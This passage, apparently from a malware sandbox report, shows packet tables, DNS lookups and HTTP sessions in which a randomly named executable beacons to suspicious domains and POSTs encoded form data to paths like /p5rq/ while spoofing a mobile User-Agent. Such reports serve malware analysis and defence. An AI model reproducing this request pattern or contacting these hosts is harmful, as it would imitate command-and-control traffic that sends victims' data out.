                              Sep 11, 2024 14:26:09.386543989 CEST4972080192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:09.391848087 CEST8049720103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:10.257302046 CEST8049720103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:10.257328033 CEST8049720103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:10.257388115 CEST4972080192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:10.897735119 CEST4972080192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:11.919754982 CEST4972180192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:11.924693108 CEST8049721103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:11.924776077 CEST4972180192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:11.942610979 CEST4972180192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:11.947701931 CEST8049721103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:11.947712898 CEST8049721103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:12.824970961 CEST8049721103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:12.824990988 CEST8049721103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:12.825438976 CEST4972180192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:13.460072041 CEST4972180192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:14.479084969 CEST4972280192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:14.484072924 CEST8049722103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:14.484252930 CEST4972280192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:14.491461039 CEST4972280192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:14.496285915 CEST8049722103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:15.364213943 CEST8049722103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:15.364584923 CEST8049722103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:15.364789009 CEST4972280192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:15.368304968 CEST4972280192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:15.373178005 CEST8049722103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:20.396421909 CEST4972380192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:20.401299000 CEST80497233.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:20.401369095 CEST4972380192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:20.414041996 CEST4972380192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:20.418888092 CEST80497233.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:20.868561029 CEST80497233.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:20.868957043 CEST4972380192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:21.928867102 CEST4972380192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:21.933727980 CEST80497233.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:22.956022024 CEST4972480192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:22.961759090 CEST80497243.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:22.961915016 CEST4972480192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:22.973388910 CEST4972480192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:22.978302002 CEST80497243.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:23.445012093 CEST80497243.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:23.445178986 CEST4972480192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:25.010390997 CEST4972480192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:25.015551090 CEST80497243.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:26.026165962 CEST4972580192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:26.031009912 CEST80497253.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:26.031410933 CEST4972580192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:26.043894053 CEST4972580192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:26.048994064 CEST80497253.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:26.049026966 CEST80497253.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:26.520967960 CEST80497253.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:26.521060944 CEST4972580192.168.2.113.33.130.190

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Sep 11, 2024 14:25:18.159162045 CEST5691353192.168.2.111.1.1.1
                              Sep 11, 2024 14:25:18.168704987 CEST53569131.1.1.1192.168.2.11
                              Sep 11, 2024 14:25:23.182786942 CEST5453153192.168.2.111.1.1.1
                              Sep 11, 2024 14:25:23.200865030 CEST53545311.1.1.1192.168.2.11
                              Sep 11, 2024 14:25:38.729727983 CEST5502953192.168.2.111.1.1.1
                              Sep 11, 2024 14:25:39.155663013 CEST53550291.1.1.1192.168.2.11
                              Sep 11, 2024 14:25:52.745178938 CEST6023453192.168.2.111.1.1.1
                              Sep 11, 2024 14:25:53.001246929 CEST53602341.1.1.1192.168.2.11
                              Sep 11, 2024 14:26:06.495399952 CEST5446253192.168.2.111.1.1.1
                              Sep 11, 2024 14:26:06.822206974 CEST53544621.1.1.1192.168.2.11
                              Sep 11, 2024 14:26:20.385597944 CEST6171353192.168.2.111.1.1.1
                              Sep 11, 2024 14:26:20.393862963 CEST53617131.1.1.1192.168.2.11

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Sep 11, 2024 14:25:18.159162045 CEST192.168.2.111.1.1.10x1adStandard query (0)www.linkbasic.netA (IP address)IN (0x0001)false
                              Sep 11, 2024 14:25:23.182786942 CEST192.168.2.111.1.1.10xdb07Standard query (0)www.chamadaslotgiris.netA (IP address)IN (0x0001)false
                              Sep 11, 2024 14:25:38.729727983 CEST192.168.2.111.1.1.10xcaa5Standard query (0)www.masteriocp.onlineA (IP address)IN (0x0001)false
                              Sep 11, 2024 14:25:52.745178938 CEST192.168.2.111.1.1.10xd0cfStandard query (0)www.mediaplug.bizA (IP address)IN (0x0001)false
                              Sep 11, 2024 14:26:06.495399952 CEST192.168.2.111.1.1.10x958bStandard query (0)www.independent200.orgA (IP address)IN (0x0001)false
                              Sep 11, 2024 14:26:20.385597944 CEST192.168.2.111.1.1.10x7d27Standard query (0)www.tigre777gg.onlineA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Sep 11, 2024 14:25:18.168704987 CEST1.1.1.1192.168.2.110x1adName error (3)www.linkbasic.netnonenoneA (IP address)IN (0x0001)false
                              Sep 11, 2024 14:25:23.200865030 CEST1.1.1.1192.168.2.110xdb07No error (0)www.chamadaslotgiris.netchamadaslotgiris.netCNAME (Canonical name)IN (0x0001)false
                              Sep 11, 2024 14:25:23.200865030 CEST1.1.1.1192.168.2.110xdb07No error (0)chamadaslotgiris.net3.33.130.190A (IP address)IN (0x0001)false
                              Sep 11, 2024 14:25:23.200865030 CEST1.1.1.1192.168.2.110xdb07No error (0)chamadaslotgiris.net15.197.148.33A (IP address)IN (0x0001)false
                              Sep 11, 2024 14:25:39.155663013 CEST1.1.1.1192.168.2.110xcaa5No error (0)www.masteriocp.onlinedns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                              Sep 11, 2024 14:25:39.155663013 CEST1.1.1.1192.168.2.110xcaa5No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                              Sep 11, 2024 14:25:39.155663013 CEST1.1.1.1192.168.2.110xcaa5No error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                              Sep 11, 2024 14:25:39.155663013 CEST1.1.1.1192.168.2.110xcaa5No error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                              Sep 11, 2024 14:25:53.001246929 CEST1.1.1.1192.168.2.110xd0cfNo error (0)www.mediaplug.biz66.81.203.10A (IP address)IN (0x0001)false
                              Sep 11, 2024 14:25:53.001246929 CEST1.1.1.1192.168.2.110xd0cfNo error (0)www.mediaplug.biz66.81.203.200A (IP address)IN (0x0001)false
                              Sep 11, 2024 14:25:53.001246929 CEST1.1.1.1192.168.2.110xd0cfNo error (0)www.mediaplug.biz66.81.203.135A (IP address)IN (0x0001)false
                              Sep 11, 2024 14:26:06.822206974 CEST1.1.1.1192.168.2.110x958bNo error (0)www.independent200.org103.42.108.46A (IP address)IN (0x0001)false
                              Sep 11, 2024 14:26:20.393862963 CEST1.1.1.1192.168.2.110x7d27No error (0)www.tigre777gg.onlinetigre777gg.onlineCNAME (Canonical name)IN (0x0001)false
                              Sep 11, 2024 14:26:20.393862963 CEST1.1.1.1192.168.2.110x7d27No error (0)tigre777gg.online3.33.130.190A (IP address)IN (0x0001)false
                              Sep 11, 2024 14:26:20.393862963 CEST1.1.1.1192.168.2.110x7d27No error (0)tigre777gg.online15.197.148.33A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • www.chamadaslotgiris.net
                              • www.masteriocp.online
                              • www.mediaplug.biz
                              • www.independent200.org
                              • www.tigre777gg.online

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.11497103.33.130.190804884C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              TimestampBytes transferredDirectionData
                              Sep 11, 2024 14:25:23.222680092 CEST515OUTGET /gqyt/?yXf=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyyR5H80Th6YuXnGllCxy50CTDtPW+4zyR3Ik=&ndk=ctppWTth- HTTP/1.1
                              Host: www.chamadaslotgiris.net
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-US
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Sep 11, 2024 14:25:23.684370041 CEST393INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Wed, 11 Sep 2024 12:25:23 GMT
                              Content-Type: text/html
                              Content-Length: 253
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 58 66 3d 4e 5a 65 53 70 2f 4d 38 42 6b 49 4c 44 6d 78 6a 6f 52 36 45 48 79 72 45 32 6b 67 37 68 48 50 52 47 69 66 7a 30 2f 74 6d 56 69 32 62 31 6f 56 4f 35 4e 65 48 65 4c 32 75 6c 7a 4f 6e 66 34 49 79 32 63 74 6a 45 76 53 38 33 34 77 30 35 67 4d 73 36 4d 51 79 79 52 35 48 38 30 54 68 36 59 75 58 6e 47 6c 6c 43 78 79 35 30 43 54 44 74 50 57 2b 34 7a 79 52 33 49 6b 3d 26 6e 64 6b 3d 63 74 70 70 57 54 74 68 2d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?yXf=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyyR5H80Th6YuXnGllCxy50CTDtPW+4zyR3Ik=&ndk=ctppWTth-"}</script></head></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.114971118.139.62.226804884C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              TimestampBytes transferredDirectionData
                              Sep 11, 2024 14:25:39.174925089 CEST788OUTPOST /p5rq/ HTTP/1.1
                              Host: www.masteriocp.online
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 200
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.masteriocp.online
                              Referer: http://www.masteriocp.online/p5rq/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 56 41 32 6d 6d 78 6d 61 55 48 49 78 68 4c 70 74 77 55 35 72 38 72 79 6f 48 6b 79 76 70 7a 4a 33 76 2f 41 74 77 37 43 61 6b 78 4a 79 76 41 52 65 68 4c 4a 7a 7a 48 61 4d 4d 50 61 55 54 66 5a 6e 78 59 4b 2f 65 65 41 32 58 6d 30 61 5a 79 46 2f 45 50 64 2b 76 38 4e 6b 6d 48 63 52 4f 41 42 32 48 4a 6d 54 68 64 42 70 74 46 53 6b 79 31 46 56 37 4a 2f 54 73 5a 72 77 54 6f 67 65 66 70 64 38 61 35 32 6e 2b 37 47 43 52 38 73 4e 7a 4d 30 56 4b 6d 6e 37 76 68 59 70 68 74 35 2b 5a 34 2b 33 76 79 50 2b 32 69 6f 68 72 51 4a 62 67 47 5a 61 69 36 2b 53 6f 67 3d 3d
                              Data Ascii: yXf=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7vhYpht5+Z4+3vyP+2iohrQJbgGZai6+Sog==
                              Sep 11, 2024 14:25:40.404805899 CEST368INHTTP/1.1 301 Moved Permanently
                              Server: openresty
                              Date: Wed, 11 Sep 2024 12:25:39 GMT
                              Content-Type: text/html
                              Content-Length: 166
                              Connection: close
                              Location: https://www.masteriocp.online/p5rq/
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>
                              Sep 11, 2024 14:25:40.404974937 CEST368INHTTP/1.1 301 Moved Permanently
                              Server: openresty
                              Date: Wed, 11 Sep 2024 12:25:39 GMT
                              Content-Type: text/html
                              Content-Length: 166
                              Connection: close
                              Location: https://www.masteriocp.online/p5rq/
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.114971218.139.62.226804884C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              TimestampBytes transferredDirectionData
                              Sep 11, 2024 14:25:41.728666067 CEST808OUTPOST /p5rq/ HTTP/1.1
                              Host: www.masteriocp.online
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 220
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.masteriocp.online
                              Referer: http://www.masteriocp.online/p5rq/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 48 54 2b 6d 6b 53 4f 61 46 33 49 32 6b 4c 70 74 70 45 35 76 38 72 32 6f 48 6c 33 6b 6f 48 6c 33 76 61 38 74 69 75 75 61 74 68 4a 79 67 67 52 48 76 72 4a 6f 7a 47 6d 45 4d 50 57 55 54 66 4e 6e 78 59 61 2f 64 70 63 35 55 57 30 59 51 53 46 35 4c 76 64 2b 76 38 4e 6b 6d 48 49 33 4f 45 6c 32 48 36 75 54 75 5a 64 71 75 46 53 6e 6d 6c 46 56 2f 4a 2b 61 73 5a 71 64 54 74 49 6b 66 76 5a 38 61 34 47 6e 2f 71 47 42 62 38 73 50 33 4d 31 48 4f 6c 32 67 32 78 56 2b 34 76 70 63 5a 39 61 58 6a 55 65 6b 6d 42 68 32 6f 44 42 5a 30 67 34 71 72 4c 62 62 7a 6e 77 52 56 41 2b 4a 71 2b 32 4d 79 63 6a 51 2f 4d 68 6a 54 78 30 3d
                              Data Ascii: yXf=cwFSIiCmOGbNHT+mkSOaF3I2kLptpE5v8r2oHl3koHl3va8tiuuathJyggRHvrJozGmEMPWUTfNnxYa/dpc5UW0YQSF5Lvd+v8NkmHI3OEl2H6uTuZdquFSnmlFV/J+asZqdTtIkfvZ8a4Gn/qGBb8sP3M1HOl2g2xV+4vpcZ9aXjUekmBh2oDBZ0g4qrLbbznwRVA+Jq+2MycjQ/MhjTx0=
                              Sep 11, 2024 14:25:42.624095917 CEST368INHTTP/1.1 301 Moved Permanently
                              Server: openresty
                              Date: Wed, 11 Sep 2024 12:25:42 GMT
                              Content-Type: text/html
                              Content-Length: 166
                              Connection: close
                              Location: https://www.masteriocp.online/p5rq/
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.114971318.139.62.226804884C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              TimestampBytes transferredDirectionData
                              Sep 11, 2024 14:25:44.276164055 CEST1821OUTPOST /p5rq/ HTTP/1.1
                              Host: www.masteriocp.online
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 1232
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.masteriocp.online
                              Referer: http://www.masteriocp.online/p5rq/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 48 54 2b 6d 6b 53 4f 61 46 33 49 32 6b 4c 70 74 70 45 35 76 38 72 32 6f 48 6c 33 6b 6f 48 74 33 76 73 6f 74 77 5a 61 61 2f 78 4a 79 74 41 52 43 76 72 49 36 7a 48 4f 36 4d 50 4c 6a 54 63 31 6e 7a 36 69 2f 59 63 6f 35 44 47 30 59 50 43 46 34 45 50 64 72 76 39 68 37 6d 48 59 33 4f 45 6c 32 48 37 65 54 6e 74 42 71 69 6c 53 6b 79 31 46 6a 37 4a 2b 79 73 5a 7a 6f 54 74 45 30 66 38 52 38 61 59 57 6e 39 59 2b 42 58 38 73 33 77 4d 30 43 4f 6c 36 46 32 78 4a 79 34 75 4e 36 5a 37 71 58 31 77 7a 74 69 67 68 68 79 53 6c 6f 67 77 6b 5a 6d 49 69 66 79 30 38 36 44 51 4c 32 35 4f 32 75 37 35 4b 59 74 4a 39 59 4e 58 77 33 72 65 41 41 72 74 38 51 35 58 66 2b 7a 47 31 6e 77 48 5a 43 62 52 63 34 32 35 52 41 71 62 59 74 56 36 69 63 7a 6b 68 32 4c 4f 56 6a 75 62 66 37 69 31 43 38 46 4d 52 34 66 48 32 56 58 44 79 33 34 70 43 42 2b 4d 61 68 5a 75 78 38 6c 49 43 6d 58 63 66 6c 44 30 43 37 78 47 34 37 53 62 38 42 61 78 35 45 50 67 39 55 39 43 6f 63 67 53 6f 33 73 75 79 4c 30 78 [TRUNCATED]
                              Data Ascii: yXf=cwFSIiCmOGbNHT+mkSOaF3I2kLptpE5v8r2oHl3koHt3vsotwZaa/xJytARCvrI6zHO6MPLjTc1nz6i/Yco5DG0YPCF4EPdrv9h7mHY3OEl2H7eTntBqilSky1Fj7J+ysZzoTtE0f8R8aYWn9Y+BX8s3wM0COl6F2xJy4uN6Z7qX1wztighhySlogwkZmIify086DQL25O2u75KYtJ9YNXw3reAArt8Q5Xf+zG1nwHZCbRc425RAqbYtV6iczkh2LOVjubf7i1C8FMR4fH2VXDy34pCB+MahZux8lICmXcflD0C7xG47Sb8Bax5EPg9U9CocgSo3suyL0x9LBixVrcKhDygvCaenDMA9KMeJ5BcwQUfYZyvLt024o0t3a6gcAa9obooCynLLZnYwgkjSxk1ly0p2OBcWwCpRb4hhtdOuGLzUPZOEeDgNlR7H/CWc+BmL6DHXCr70hNo6j8v1pKHiVWgC+0H5G9X1GCiJi7V3LswsyXwyqG+JbgAS9j2a0Vq7sfU/QheYcRAG6f0rSETdOKkuPa8yCa34pR8cQJP3dlDq6/AADzbzg290Fnts/JW//1mDRIQ0f0ukgF6rAIR9DucGGXHxpMfqbcDSZLKVIdSCcE2K4Sm9Ib38IsHVokr8uL827l0Yd5UqadxXi82sCMi0dJ+AoieG6YPw8hLXpIdkwjmwSZFT+c/F1I1Fd6ReWn2qT6sXs2KY7DnKiyDdxutfA6xcKcnY89h8rLbzN2nxAoCyVdPYEtQsK2nFJc731568geh9kAalovWfeCIcYES6RxfWtaP/vzIn/JX207mrHOghb4krmLd89JD4ZGYCoeVy3n7USVXfT26azo8fingTRBJK/WHwBdjZRt1UG+cQrYbsvivFPiRCtxWZV544oBd+F9nDmMw4m7c0bFdrNT0K9sQbCngCEF7C8T1/gu0bNED6W56h+iAndljzGtJVHrtF9gvQ/242qDMpyJ4L9rxnAk6BSbQFj+oSQvAqP2oK [TRUNCATED]
                              Sep 11, 2024 14:25:45.179224014 CEST368INHTTP/1.1 301 Moved Permanently
                              Server: openresty
                              Date: Wed, 11 Sep 2024 12:25:45 GMT
                              Content-Type: text/html
                              Content-Length: 166
                              Connection: close
                              Location: https://www.masteriocp.online/p5rq/
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.114971418.139.62.226804884C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              TimestampBytes transferredDirectionData
                              Sep 11, 2024 14:25:46.821049929 CEST512OUTGET /p5rq/?ndk=ctppWTth-&yXf=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5XgIEfDpHSeJZt7k9yl5pOWpoKoGLmM15kwU= HTTP/1.1
                              Host: www.masteriocp.online
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-US
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Sep 11, 2024 14:25:47.733251095 CEST507INHTTP/1.1 301 Moved Permanently
                              Server: openresty
                              Date: Wed, 11 Sep 2024 12:25:47 GMT
                              Content-Type: text/html
                              Content-Length: 166
                              Connection: close
                              Location: https://www.masteriocp.online/p5rq/?ndk=ctppWTth-&yXf=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5XgIEfDpHSeJZt7k9yl5pOWpoKoGLmM15kwU=
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.114971566.81.203.10804884C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              TimestampBytes transferredDirectionData
                              Sep 11, 2024 14:25:53.020313978 CEST776OUTPOST /osde/ HTTP/1.1
                              Host: www.mediaplug.biz
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 200
                              Content-Type: application/x-www-form-urlencoded
